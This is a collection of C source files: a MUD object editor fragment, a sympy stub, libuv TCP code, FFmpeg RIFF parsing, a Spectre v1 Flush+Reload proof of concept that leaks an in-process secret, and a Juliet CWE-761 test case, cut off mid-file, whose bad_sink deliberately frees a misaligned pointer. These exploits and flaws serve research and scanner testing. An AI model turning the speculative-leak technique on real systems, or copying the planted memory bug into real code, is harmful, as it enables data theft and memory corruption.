= OEDIT_SPECAB_VALUE_2; oedit_disp_specab_val2_menu(d); return; case ITEM_SPECAB_HORN_OF_SUMMONING: /* Val 1: VNUM of mob summoned. */ number = atoi(arg); if ((number < 0) || (number >= 12157521)) { /* Value out of range. 
*/ write_to_output(d, "Invalid vnum, try again : "); return; } OLC_SPECAB(d)->value[0] = number; OLC_MODE(d) = OEDIT_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case WEAPON_SPECAB_SPELL_STORING: /* Val 1: SPELL NUMBER */ ; default:; } case OEDIT_SPECAB_VALUE_2: switch (OLC_SPECAB(d)->ability) { case WEAPON_SPECAB_BANE: /* Val 2: NPC SUBRACE */ number = atoi(arg); if ((number < 0) || (number >= NUM_SUB_RACES)) { /* Value out of range. */ write_to_output(d, "Invalid choice, try again : "); return; } OLC_SPECAB(d)->value[1] = number; /* Finished. */ OLC_MODE(d) = OEDIT_ASSIGN_WEAPON_SPECAB_MENU; oedit_disp_assign_weapon_specab_menu(d); return; case WEAPON_SPECAB_SPELL_STORING: /* Val 2: SPELL LEVEL */ ; default:; } case OEDIT_SPECAB_VALUE_3: switch (OLC_SPECAB(d)->ability) { default:; } case OEDIT_SPECAB_VALUE_4: switch (OLC_SPECAB(d)->ability) { default:; } default: mudlog(BRF, LVL_BUILDER, TRUE, "SYSERR: OLC: Reached default case in oedit_parse()!"); write_to_output(d, "Oops...\r\n"); break; } /* If we get here, we have changed something. */ OLC_VAL(d) = 1; oedit_disp_menu(d); } void oedit_string_cleanup(struct descriptor_data *d, int terminator) { switch (OLC_MODE(d)) { case OEDIT_ACTDESC: oedit_disp_menu(d); break; case OEDIT_EXTRADESC_DESCRIPTION: oedit_disp_extradesc_menu(d); break; } }
467520.c
/******************************************************************************
 *                      Code generated with sympy 0.7.6                      *
 *                                                                            *
 *              See http://www.sympy.org/ for more information.              *
 *                                                                            *
 *                       This file is part of 'project'                      *
 ******************************************************************************/
#include "pinky_metacarpal_pinky_dist_length_2.h"
#include <math.h>

double pinky_metacarpal_pinky_dist_length_2() {

   double pinky_metacarpal_pinky_dist_length_2_result;
   pinky_metacarpal_pinky_dist_length_2_result = 0;
   return pinky_metacarpal_pinky_dist_length_2_result;

}
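
/* Hedged usage sketch (not part of the generated file): sympy's C code
 * generator emits one pure function per expression, declared in the matching
 * header; a caller just links the .c/.h pair and calls the function. For this
 * model parameter the generated expression happens to be the constant 0.
 * Disabled with #if 0 so the generated translation unit stays unchanged. */
#if 0
#include <stdio.h>
#include "pinky_metacarpal_pinky_dist_length_2.h"

int main(void) {
   printf("length^2 = %f\n", pinky_metacarpal_pinky_dist_length_2());
   return 0;
}
#endif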
246518.c
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include "../../../libcache/cacheutils.h"

// accessible data
#define DATA "data|"

// inaccessible secret (following accessible data)
#define SECRET "INACCESSIBLE SECRET"

#define DATA_SECRET DATA SECRET

unsigned char data[128];

void access_array(int x) {
  // flushing the data which is used in the condition increases
  // probability of speculation
  size_t len = sizeof(DATA) - 1;

  mfence();
  flush(&len);
  flush(&x);

  // ensure data is flushed at this point
  mfence();

  // check that only accessible part (DATA) can be accessed
  if((float)x / (float)len < 1) {
    // countermeasure: add the fence here
    cache_encode(data[x]);
  }
}

int main(int argc, const char **argv) {
  // Detect cache threshold
  if(!CACHE_MISS)
    CACHE_MISS = detect_flush_reload_threshold();
  printf("[\x1b[33m*\x1b[0m] Flush+Reload Threshold: \x1b[33m%zd\x1b[0m\n", CACHE_MISS);

  pagesize = sysconf(_SC_PAGESIZE);

  char *_mem = malloc(pagesize * (256 + 4));
  // page aligned
  mem = (char *)(((size_t)_mem & ~(pagesize-1)) + pagesize * 2);

  pid_t pid = fork();

  // initialize memory
  memset(mem, pid, pagesize * 256);

  // store secret
  memset(data, ' ', sizeof(data));
  memcpy(data, DATA_SECRET, sizeof(DATA_SECRET));

  // ensure data terminates
  data[sizeof(data) / sizeof(data[0]) - 1] = '\0';

  // flush our shared memory
  flush_shared_memory();

  // nothing leaked so far
  char leaked[sizeof(DATA_SECRET) + 1];
  memset(leaked, ' ', sizeof(leaked));
  leaked[sizeof(DATA_SECRET)] = 0;

  int j = 0;
  while(1) {
    // for every byte in the string
    j = (j + 1) % sizeof(DATA_SECRET);

    // mistrain with valid index
    if(pid == 0) {
      for(int y = 0; y < 10; y++) {
        access_array(0);
      }
    } else {
      // potential out-of-bounds access
      access_array(j);

      // only show inaccessible values (SECRET)
      if(j >= sizeof(DATA) - 1) {
        mfence(); // avoid speculation
        cache_decode_pretty(leaked, j);
      }

      if(!strncmp(leaked + sizeof(DATA) - 1, SECRET, sizeof(SECRET) - 1))
        break;

      sched_yield();
    }
  }
  printf("\n\x1b[1A[ ]\n\n[\x1b[32m>\x1b[0m] Done\n");
}
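
// Hedged sketch of the countermeasure pointed at by the comment inside
// access_array() above: placing a serializing fence between the bounds
// check and the dependent load stops the transiently-executed
// out-of-bounds access from encoding the secret into the cache. This
// variant (access_array_fenced) is illustrative, not part of the original
// PoC; it reuses the mfence()/cache_encode() helpers from cacheutils.h as
// used in this file (on x86, lfence is the architecturally recommended
// speculation barrier). Disabled so the PoC itself is unchanged.
#if 0
void access_array_fenced(int x) {
  size_t len = sizeof(DATA) - 1;

  mfence();
  flush(&len);
  flush(&x);
  mfence();

  if((float)x / (float)len < 1) {
    mfence(); // serialize here: the load below no longer runs ahead of the check
    cache_encode(data[x]);
  }
}
#endif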
549213.c
/* Copyright Joyent, Inc. and other Node contributors. All rights reserved. * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to * deal in the Software without restriction, including without limitation the * rights to use, copy, modify, merge, publish, distribute, sublicense, and/or * sell copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #include "../../include/uv.h" #include "internal.h" #include <stdlib.h> #include <unistd.h> #include <assert.h> #include <errno.h> static int maybe_new_socket(uv_tcp_t* handle, int domain, int flags) { int sockfd; int err; if (domain == AF_UNSPEC || uv__stream_fd(handle) != -1) { handle->flags |= flags; return 0; } err = uv__socket(domain, SOCK_STREAM, 0); if (err < 0) return err; sockfd = err; err = uv__stream_open((uv_stream_t*) handle, sockfd, flags); if (err) { uv__close(sockfd); return err; } return 0; } int uv_tcp_init_ex(uv_loop_t* loop, uv_tcp_t* tcp, unsigned int flags) { int domain; /* Use the lower 8 bits for the domain */ domain = flags & 0xFF; if (domain != AF_INET && domain != AF_INET6 && domain != AF_UNSPEC) return -EINVAL; if (flags & ~0xFF) return -EINVAL; uv__stream_init(loop, (uv_stream_t*)tcp, UV_TCP); /* If anything fails beyond this point we need to remove the handle from * the handle queue, since it was added by uv__handle_init in uv_stream_init. */ if (domain != AF_UNSPEC) { int err = maybe_new_socket(tcp, domain, 0); if (err) { QUEUE_REMOVE(&tcp->handle_queue); return err; } } return 0; } int uv_tcp_init(uv_loop_t* loop, uv_tcp_t* tcp) { return uv_tcp_init_ex(loop, tcp, AF_UNSPEC); } int uv__tcp_bind(uv_tcp_t* tcp, const struct sockaddr* addr, unsigned int addrlen, unsigned int flags) { int err; int on; /* Cannot set IPv6-only mode on non-IPv6 socket. */ if ((flags & UV_TCP_IPV6ONLY) && addr->sa_family != AF_INET6) return -EINVAL; err = maybe_new_socket(tcp, addr->sa_family, UV_STREAM_READABLE | UV_STREAM_WRITABLE); if (err) return err; on = 1; if (setsockopt(tcp->io_watcher.fd, SOL_SOCKET, SO_REUSEADDR, &on, sizeof(on))) return -errno; #ifdef IPV6_V6ONLY if (addr->sa_family == AF_INET6) { on = (flags & UV_TCP_IPV6ONLY) != 0; if (setsockopt(tcp->io_watcher.fd, IPPROTO_IPV6, IPV6_V6ONLY, &on, sizeof on) == -1) { #if defined(__MVS__) if (errno == EOPNOTSUPP) return -EINVAL; #endif return -errno; } } #endif errno = 0; if (bind(tcp->io_watcher.fd, addr, addrlen) && errno != EADDRINUSE) { if (errno == EAFNOSUPPORT) /* OSX, other BSDs and SunoS fail with EAFNOSUPPORT when binding a * socket created with AF_INET to an AF_INET6 address or vice versa. 
*/ return -EINVAL; return -errno; } tcp->delayed_error = -errno; tcp->flags |= UV_HANDLE_BOUND; if (addr->sa_family == AF_INET6) tcp->flags |= UV_HANDLE_IPV6; return 0; } int uv__tcp_connect(uv_connect_t* req, uv_tcp_t* handle, const struct sockaddr* addr, unsigned int addrlen, uv_connect_cb cb) { int err; int r; assert(handle->type == UV_TCP); if (handle->connect_req != NULL) return -EALREADY; /* FIXME(bnoordhuis) -EINVAL or maybe -EBUSY. */ err = maybe_new_socket(handle, addr->sa_family, UV_STREAM_READABLE | UV_STREAM_WRITABLE); if (err) return err; handle->delayed_error = 0; do { errno = 0; r = connect(uv__stream_fd(handle), addr, addrlen); } while (r == -1 && errno == EINTR); /* We not only check the return value, but also check the errno != 0. * Because in rare cases connect() will return -1 but the errno * is 0 (for example, on Android 4.3, OnePlus phone A0001_12_150227) * and actually the tcp three-way handshake is completed. */ if (r == -1 && errno != 0) { if (errno == EINPROGRESS) ; /* not an error */ else if (errno == ECONNREFUSED) /* If we get a ECONNREFUSED wait until the next tick to report the * error. Solaris wants to report immediately--other unixes want to * wait. */ handle->delayed_error = -errno; else return -errno; } uv__req_init(handle->loop, req, UV_CONNECT); req->cb = cb; req->handle = (uv_stream_t*) handle; QUEUE_INIT(&req->queue); handle->connect_req = req; uv__io_start(handle->loop, &handle->io_watcher, POLLOUT); if (handle->delayed_error) uv__io_feed(handle->loop, &handle->io_watcher); return 0; } int uv_tcp_open(uv_tcp_t* handle, uv_os_sock_t sock) { int err; err = uv__nonblock(sock, 1); if (err) return err; return uv__stream_open((uv_stream_t*)handle, sock, UV_STREAM_READABLE | UV_STREAM_WRITABLE); } int uv_tcp_getsockname(const uv_tcp_t* handle, struct sockaddr* name, int* namelen) { socklen_t socklen; if (handle->delayed_error) return handle->delayed_error; if (uv__stream_fd(handle) < 0) return -EINVAL; /* FIXME(bnoordhuis) -EBADF */ /* sizeof(socklen_t) != sizeof(int) on some systems. */ socklen = (socklen_t) *namelen; if (getsockname(uv__stream_fd(handle), name, &socklen)) return -errno; *namelen = (int) socklen; return 0; } int uv_tcp_getpeername(const uv_tcp_t* handle, struct sockaddr* name, int* namelen) { socklen_t socklen; if (handle->delayed_error) return handle->delayed_error; if (uv__stream_fd(handle) < 0) return -EINVAL; /* FIXME(bnoordhuis) -EBADF */ /* sizeof(socklen_t) != sizeof(int) on some systems. */ socklen = (socklen_t) *namelen; if (getpeername(uv__stream_fd(handle), name, &socklen)) return -errno; *namelen = (int) socklen; return 0; } int uv_tcp_listen(uv_tcp_t* tcp, int backlog, uv_connection_cb cb) { static int single_accept = -1; int err; if (tcp->delayed_error) return tcp->delayed_error; if (single_accept == -1) { const char* val = getenv("UV_TCP_SINGLE_ACCEPT"); single_accept = (val != NULL && atoi(val) != 0); /* Off by default. */ } if (single_accept) tcp->flags |= UV_TCP_SINGLE_ACCEPT; err = maybe_new_socket(tcp, AF_INET, UV_STREAM_READABLE); if (err) return err; #ifdef __MVS__ /* on zOS the listen call does not bind automatically if the socket is unbound. 
     Hence binding to an arbitrary port must be done manually. */
  if (!(tcp->flags & UV_HANDLE_BOUND)) {
    struct sockaddr_storage saddr;
    socklen_t slen = sizeof(saddr);
    memset(&saddr, 0, sizeof(saddr));

    if (getsockname(tcp->io_watcher.fd, (struct sockaddr*) &saddr, &slen))
      return -errno;

    if (bind(tcp->io_watcher.fd, (struct sockaddr*) &saddr, slen))
      return -errno;

    tcp->flags |= UV_HANDLE_BOUND;
  }
#endif

  if (listen(tcp->io_watcher.fd, backlog))
    return -errno;

  tcp->connection_cb = cb;
  tcp->flags |= UV_HANDLE_BOUND;

  /* Start listening for connections. */
  tcp->io_watcher.cb = uv__server_io;
  uv__io_start(tcp->loop, &tcp->io_watcher, POLLIN);

  return 0;
}


int uv__tcp_nodelay(int fd, int on) {
  if (setsockopt(fd, IPPROTO_TCP, TCP_NODELAY, &on, sizeof(on)))
    return -errno;
  return 0;
}


int uv__tcp_keepalive(int fd, int on, unsigned int delay) {
  if (setsockopt(fd, SOL_SOCKET, SO_KEEPALIVE, &on, sizeof(on)))
    return -errno;

#ifdef TCP_KEEPIDLE
  if (on && setsockopt(fd, IPPROTO_TCP, TCP_KEEPIDLE, &delay, sizeof(delay)))
    return -errno;
#endif

  /* Solaris/SmartOS, if you don't support keep-alive,
   * then don't advertise it in your system headers...
   */
  /* FIXME(bnoordhuis) That's possibly because sizeof(delay) should be 1. */
#if defined(TCP_KEEPALIVE) && !defined(__sun)
  if (on && setsockopt(fd, IPPROTO_TCP, TCP_KEEPALIVE, &delay, sizeof(delay)))
    return -errno;
#endif

  return 0;
}


int uv_tcp_nodelay(uv_tcp_t* handle, int on) {
  int err;

  if (uv__stream_fd(handle) != -1) {
    err = uv__tcp_nodelay(uv__stream_fd(handle), on);
    if (err)
      return err;
  }

  if (on)
    handle->flags |= UV_TCP_NODELAY;
  else
    handle->flags &= ~UV_TCP_NODELAY;

  return 0;
}


int uv_tcp_keepalive(uv_tcp_t* handle, int on, unsigned int delay) {
  int err;

  if (uv__stream_fd(handle) != -1) {
    err = uv__tcp_keepalive(uv__stream_fd(handle), on, delay);
    if (err)
      return err;
  }

  if (on)
    handle->flags |= UV_TCP_KEEPALIVE;
  else
    handle->flags &= ~UV_TCP_KEEPALIVE;

  /* TODO Store delay if uv__stream_fd(handle) == -1 but don't want to enlarge
   * uv_tcp_t with an int that's almost never used...
   */

  return 0;
}


int uv_tcp_simultaneous_accepts(uv_tcp_t* handle, int enable) {
  if (enable)
    handle->flags &= ~UV_TCP_SINGLE_ACCEPT;
  else
    handle->flags |= UV_TCP_SINGLE_ACCEPT;
  return 0;
}


void uv__tcp_close(uv_tcp_t* handle) {
  uv__stream_close((uv_stream_t*)handle);
}
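
/* Hedged usage sketch (not part of tcp.c): how the functions above are
 * typically driven through libuv's public API. uv_listen() routes to
 * uv_tcp_listen() for TCP handles, and every call returns 0 on success or a
 * negative error code, matching the -errno convention used throughout this
 * file. Port 7000 and the callback name are illustrative. Disabled with
 * #if 0 so the library source itself stays unchanged. */
#if 0
#include <stdio.h>
#include "uv.h"  /* public header */

static void on_connection(uv_stream_t* server, int status) {
  if (status < 0) {
    fprintf(stderr, "connection error: %s\n", uv_strerror(status));
    return;
  }
  /* accept the client with uv_accept() and start reading here */
}

int main(void) {
  uv_loop_t* loop = uv_default_loop();
  uv_tcp_t server;
  struct sockaddr_in addr;
  int r;

  uv_tcp_init(loop, &server);  /* socket is created lazily (maybe_new_socket) */
  uv_ip4_addr("0.0.0.0", 7000, &addr);
  uv_tcp_bind(&server, (const struct sockaddr*) &addr, 0);

  r = uv_listen((uv_stream_t*) &server, 128, on_connection);
  if (r) {
    fprintf(stderr, "listen error: %s\n", uv_strerror(r));
    return 1;
  }
  return uv_run(loop, UV_RUN_DEFAULT);
}
#endif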
19525.c
/* * RIFF demuxing functions and data * Copyright (c) 2000 Fabrice Bellard * * This file is part of FFmpeg. * * FFmpeg is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * FFmpeg is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with FFmpeg; if not, write to the Free Software * Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA */ #include "libavutil/dict.h" #include "libavutil/error.h" #include "libavutil/log.h" #include "libavutil/mathematics.h" #include "libavcodec/avcodec.h" #include "libavcodec/bytestream.h" #include "avformat.h" #include "avio_internal.h" #include "riff.h" int ff_get_guid(AVIOContext *s, ff_asf_guid *g) { int ret; av_assert0(sizeof(*g) == 16); //compiler will optimize this out ret = avio_read(s, *g, sizeof(*g)); if (ret < (int)sizeof(*g)) { memset(*g, 0, sizeof(*g)); return ret < 0 ? ret : AVERROR_INVALIDDATA; } return 0; } enum AVCodecID ff_codec_guid_get_id(const AVCodecGuid *guids, ff_asf_guid guid) { int i; for (i = 0; guids[i].id != AV_CODEC_ID_NONE; i++) if (!ff_guidcmp(guids[i].guid, guid)) return guids[i].id; return AV_CODEC_ID_NONE; } /* We could be given one of the three possible structures here: * WAVEFORMAT, PCMWAVEFORMAT or WAVEFORMATEX. Each structure * is an expansion of the previous one with the fields added * at the bottom. PCMWAVEFORMAT adds 'WORD wBitsPerSample' and * WAVEFORMATEX adds 'WORD cbSize' and basically makes itself * an openended structure. 
*/ static void parse_waveformatex(AVFormatContext *s, AVIOContext *pb, AVCodecParameters *par) { ff_asf_guid subformat; int bps; bps = avio_rl16(pb); if (bps) par->bits_per_coded_sample = bps; par->channel_layout = avio_rl32(pb); /* dwChannelMask */ ff_get_guid(pb, &subformat); if (!memcmp(subformat + 4, (const uint8_t[]){ FF_AMBISONIC_BASE_GUID }, 12) || !memcmp(subformat + 4, (const uint8_t[]){ FF_BROKEN_BASE_GUID }, 12) || !memcmp(subformat + 4, (const uint8_t[]){ FF_MEDIASUBTYPE_BASE_GUID }, 12)) { par->codec_tag = AV_RL32(subformat); par->codec_id = ff_wav_codec_get_id(par->codec_tag, par->bits_per_coded_sample); } else { par->codec_id = ff_codec_guid_get_id(ff_codec_wav_guids, subformat); if (!par->codec_id) av_log(s, AV_LOG_WARNING, "unknown subformat:"FF_PRI_GUID"\n", FF_ARG_GUID(subformat)); } } /* "big_endian" values are needed for RIFX file format */ int ff_get_wav_header(AVFormatContext *s, AVIOContext *pb, AVCodecParameters *par, int size, int big_endian) { int id; uint64_t bitrate = 0; if (size < 14) { avpriv_request_sample(s, "wav header size < 14"); avio_skip(pb, size); return 0; } par->codec_type = AVMEDIA_TYPE_AUDIO; if (!big_endian) { id = avio_rl16(pb); if (id != 0x0165) { par->channels = avio_rl16(pb); par->sample_rate = avio_rl32(pb); bitrate = avio_rl32(pb) * 8LL; par->block_align = avio_rl16(pb); } } else { id = avio_rb16(pb); par->channels = avio_rb16(pb); par->sample_rate = avio_rb32(pb); bitrate = avio_rb32(pb) * 8LL; par->block_align = avio_rb16(pb); } if (size == 14) { /* We're dealing with plain vanilla WAVEFORMAT */ par->bits_per_coded_sample = 8; } else { if (!big_endian) { par->bits_per_coded_sample = avio_rl16(pb); } else { par->bits_per_coded_sample = avio_rb16(pb); } } if (id == 0xFFFE) { par->codec_tag = 0; } else { par->codec_tag = id; par->codec_id = ff_wav_codec_get_id(id, par->bits_per_coded_sample); } if (size >= 18 && id != 0x0165) { /* We're obviously dealing with WAVEFORMATEX */ int cbSize = avio_rl16(pb); /* cbSize */ if (big_endian) { avpriv_report_missing_feature(s, "WAVEFORMATEX support for RIFX files"); return AVERROR_PATCHWELCOME; } size -= 18; cbSize = FFMIN(size, cbSize); if (cbSize >= 22 && id == 0xfffe) { /* WAVEFORMATEXTENSIBLE */ parse_waveformatex(s, pb, par); cbSize -= 22; size -= 22; } if (cbSize > 0) { av_freep(&par->extradata); if (ff_get_extradata(s, par, pb, cbSize) < 0) return AVERROR(ENOMEM); size -= cbSize; } /* It is possible for the chunk to contain garbage at the end */ if (size > 0) avio_skip(pb, size); } else if (id == 0x0165 && size >= 32) { int nb_streams, i; size -= 4; av_freep(&par->extradata); if (ff_get_extradata(s, par, pb, size) < 0) return AVERROR(ENOMEM); nb_streams = AV_RL16(par->extradata + 4); par->sample_rate = AV_RL32(par->extradata + 12); par->channels = 0; bitrate = 0; if (size < 8 + nb_streams * 20) return AVERROR_INVALIDDATA; for (i = 0; i < nb_streams; i++) par->channels += par->extradata[8 + i * 20 + 17]; } par->bit_rate = bitrate; if (par->sample_rate <= 0) { av_log(s, AV_LOG_ERROR, "Invalid sample rate: %d\n", par->sample_rate); return AVERROR_INVALIDDATA; } if (par->codec_id == AV_CODEC_ID_AAC_LATM) { /* Channels and sample_rate values are those prior to applying SBR * and/or PS. 
*/ par->channels = 0; par->sample_rate = 0; } /* override bits_per_coded_sample for G.726 */ if (par->codec_id == AV_CODEC_ID_ADPCM_G726 && par->sample_rate) par->bits_per_coded_sample = par->bit_rate / par->sample_rate; return 0; } enum AVCodecID ff_wav_codec_get_id(unsigned int tag, int bps) { enum AVCodecID id; id = ff_codec_get_id(ff_codec_wav_tags, tag); if (id <= 0) return id; if (id == AV_CODEC_ID_PCM_S16LE) id = ff_get_pcm_codec_id(bps, 0, 0, ~1); else if (id == AV_CODEC_ID_PCM_F32LE) id = ff_get_pcm_codec_id(bps, 1, 0, 0); if (id == AV_CODEC_ID_ADPCM_IMA_WAV && bps == 8) id = AV_CODEC_ID_PCM_ZORK; return id; } int ff_get_bmp_header(AVIOContext *pb, AVStream *st, uint32_t *size) { int tag1; uint32_t size_ = avio_rl32(pb); if (size) *size = size_; st->codecpar->width = avio_rl32(pb); st->codecpar->height = (int32_t)avio_rl32(pb); avio_rl16(pb); /* planes */ st->codecpar->bits_per_coded_sample = avio_rl16(pb); /* depth */ tag1 = avio_rl32(pb); avio_rl32(pb); /* ImageSize */ avio_rl32(pb); /* XPelsPerMeter */ avio_rl32(pb); /* YPelsPerMeter */ avio_rl32(pb); /* ClrUsed */ avio_rl32(pb); /* ClrImportant */ return tag1; } int ff_read_riff_info(AVFormatContext *s, int64_t size) { int64_t start, end, cur; AVIOContext *pb = s->pb; start = avio_tell(pb); end = start + size; while ((cur = avio_tell(pb)) >= 0 && cur <= end - 8 /* = tag + size */) { uint32_t chunk_code; int64_t chunk_size; char key[5] = { 0 }; char *value; chunk_code = avio_rl32(pb); chunk_size = avio_rl32(pb); if (avio_feof(pb)) { if (chunk_code || chunk_size) { av_log(s, AV_LOG_WARNING, "INFO subchunk truncated\n"); return AVERROR_INVALIDDATA; } return AVERROR_EOF; } if (chunk_size > end || end - chunk_size < cur || chunk_size == UINT_MAX) { avio_seek(pb, -9, SEEK_CUR); chunk_code = avio_rl32(pb); chunk_size = avio_rl32(pb); if (chunk_size > end || end - chunk_size < cur || chunk_size == UINT_MAX) { av_log(s, AV_LOG_WARNING, "too big INFO subchunk\n"); return AVERROR_INVALIDDATA; } } chunk_size += (chunk_size & 1); if (!chunk_code) { if (chunk_size) avio_skip(pb, chunk_size); else if (pb->eof_reached) { av_log(s, AV_LOG_WARNING, "truncated file\n"); return AVERROR_EOF; } continue; } value = av_mallocz(chunk_size + 1); if (!value) { av_log(s, AV_LOG_ERROR, "out of memory, unable to read INFO tag\n"); return AVERROR(ENOMEM); } AV_WL32(key, chunk_code); // Work around VC++ 2015 Update 1 code-gen bug: // https://connect.microsoft.com/VisualStudio/feedback/details/2291638 key[4] = 0; if (avio_read(pb, value, chunk_size) != chunk_size) { av_log(s, AV_LOG_WARNING, "premature end of file while reading INFO tag\n"); } av_dict_set(&s->metadata, key, value, AV_DICT_DONT_STRDUP_VAL); } return 0; }
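/*
 * Editor's illustration (not part of the original file): the little-endian
 * field layout that ff_get_wav_header() above walks through. This
 * standalone sketch parses the common WAVEFORMATEX prefix from a raw byte
 * buffer using only the C standard library; field names mirror the
 * Microsoft structure, and the struct/function names here are hypothetical.
 */
#include <stdint.h>
#include <string.h>

struct wave_format_ex {
    uint16_t format_tag;        /* wFormatTag: 0xFFFE = WAVEFORMATEXTENSIBLE */
    uint16_t channels;          /* nChannels */
    uint32_t samples_per_sec;   /* nSamplesPerSec */
    uint32_t avg_bytes_per_sec; /* nAvgBytesPerSec: bit_rate = this * 8 */
    uint16_t block_align;       /* nBlockAlign */
    uint16_t bits_per_sample;   /* wBitsPerSample (PCMWAVEFORMAT and later) */
    uint16_t cb_size;           /* cbSize (WAVEFORMATEX only) */
};

static uint16_t rl16(const uint8_t *p) { return (uint16_t)(p[0] | p[1] << 8); }
static uint32_t rl32(const uint8_t *p) { return rl16(p) | (uint32_t)rl16(p + 2) << 16; }

/* Returns 0 on success, -1 if the chunk is too small (cf. size < 14 above). */
static int parse_wave_format_ex(const uint8_t *buf, size_t size,
                                struct wave_format_ex *w)
{
    if (size < 14)
        return -1;
    memset(w, 0, sizeof(*w));
    w->format_tag        = rl16(buf + 0);
    w->channels          = rl16(buf + 2);
    w->samples_per_sec   = rl32(buf + 4);
    w->avg_bytes_per_sec = rl32(buf + 8);
    w->block_align       = rl16(buf + 12);
    if (size >= 16)
        w->bits_per_sample = rl16(buf + 14); /* PCMWAVEFORMAT extension */
    if (size >= 18)
        w->cb_size = rl16(buf + 16);         /* WAVEFORMATEX extension */
    return 0;
}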
280490.c
/* TEMPLATE GENERATED TESTCASE FILE Filename: CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41.c Label Definition File: CWE761_Free_Pointer_Not_At_Start_Of_Buffer.label.xml Template File: source-sinks-41.tmpl.c */ /* * @description * CWE: 761 Free Pointer Not At Start of Buffer * BadSource: listen_socket Read data using a listen socket (server side) * Sinks: * GoodSink: free() memory correctly at the start of the buffer * BadSink : free() memory not at the start of the buffer * Flow Variant: 41 Data flow: data passed as an argument from one function to another in the same source file * * */ #include "std_testcase.h" #include <wchar.h> #define SEARCH_CHAR 'S' #define BAD_SRC_FIXED "Fixed String" /* MAINTENANCE NOTE: This string must contain the SEARCH_CHAR */ #ifdef _WIN32 # include <winsock2.h> # include <windows.h> # include <direct.h> # define PATH_SZ 100 # pragma comment(lib, "ws2_32") /* include ws2_32.lib when linking */ # define CLOSE_SOCKET closesocket #else # define PATH_SZ PATH_MAX # define INVALID_SOCKET -1 # define SOCKET_ERROR -1 # define CLOSE_SOCKET close # define SOCKET int #endif #define TCP_PORT 27015 #define LISTEN_BACKLOG 5 #ifndef OMITBAD static void bad_sink(char * data) { /* FLAW: We are incrementing the pointer in the loop - this will cause us to free the * memory block not at the start of the buffer */ for (; *data != '\0'; data++) { if (*data == SEARCH_CHAR) { printLine("We have a match!"); break; } } free(data); } void CWE761_Free_Pointer_Not_At_Start_Of_Buffer__char_listen_socket_41_bad() { char * data; data = (char *)malloc(100*sizeof(char)); data[0] = '\0'; { #ifdef _WIN32 WSADATA wsa_data; int wsa_data_init = 0; #endif int recv_rv; struct sockaddr_in s_in; char *replace; SOCKET listen_socket = INVALID_SOCKET; SOCKET accept_socket = INVALID_SOCKET; size_t data_len = strlen(data); do { #ifdef _WIN32 if (WSAStartup(MAKEWORD(2,2), &wsa_data) != NO_ERROR) break; wsa_data_init = 1; #endif listen_socket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (listen_socket == INVALID_SOCKET) break; memset(&s_in, 0, sizeof(s_in)); s_in.sin_family = AF_INET; s_in.sin_addr.s_addr = INADDR_ANY; s_in.sin_port = htons(TCP_PORT); if (bind(listen_socket, (struct sockaddr*)&s_in, sizeof(s_in)) == SOCKET_ERROR) break; if (listen(listen_socket, LISTEN_BACKLOG) == SOCKET_ERROR) break; accept_socket = accept(listen_socket, NULL, NULL); if (accept_socket == SOCKET_ERROR) break; /* Abort on error or the connection was closed */ recv_rv = recv(accept_socket, (char *)data+data_len, (int)(100-data_len-1), 0); if (recv_rv == SOCKET_ERROR || recv_rv == 0) break; /* Append null terminator */ data[recv_rv] = '\0'; /* Eliminate CRLF */ replace = strchr(data, '\r'); if (replace) *replace = '\0'; replace = strchr(data, '\n'); if (replace) *replace = '\0'; } while (0); if (listen_socket != INVALID_SOCKET) CLOSE_SOCKET(listen_socket); if (accept_socket != INVALID_SOCKET) CLOSE_SOCKET(accept_socket); #ifdef _WIN32 if (wsa_data_init) WSACleanup(); #endif } bad_sink(data); } #endif /* OMITBAD */ #ifndef OMITGOOD static void goodB2G_sink(char * data) { { size_t i; /* FIX: Use a loop variable to traverse through the string pointed to by data */ for (i=0; i < strlen(data); i++) { if (data[i] == SEARCH_CHAR) { printLine("We have a match!"); break; } } free(data); } } /* goodB2G uses the BadSource with the GoodSink */ static void goodB2G() { char * data; data = (char *)malloc(100*sizeof(char)); data[0] = '\0'; { #ifdef _WIN32 WSADATA wsa_data; int wsa_data_init = 0; #endif int recv_rv; struct 
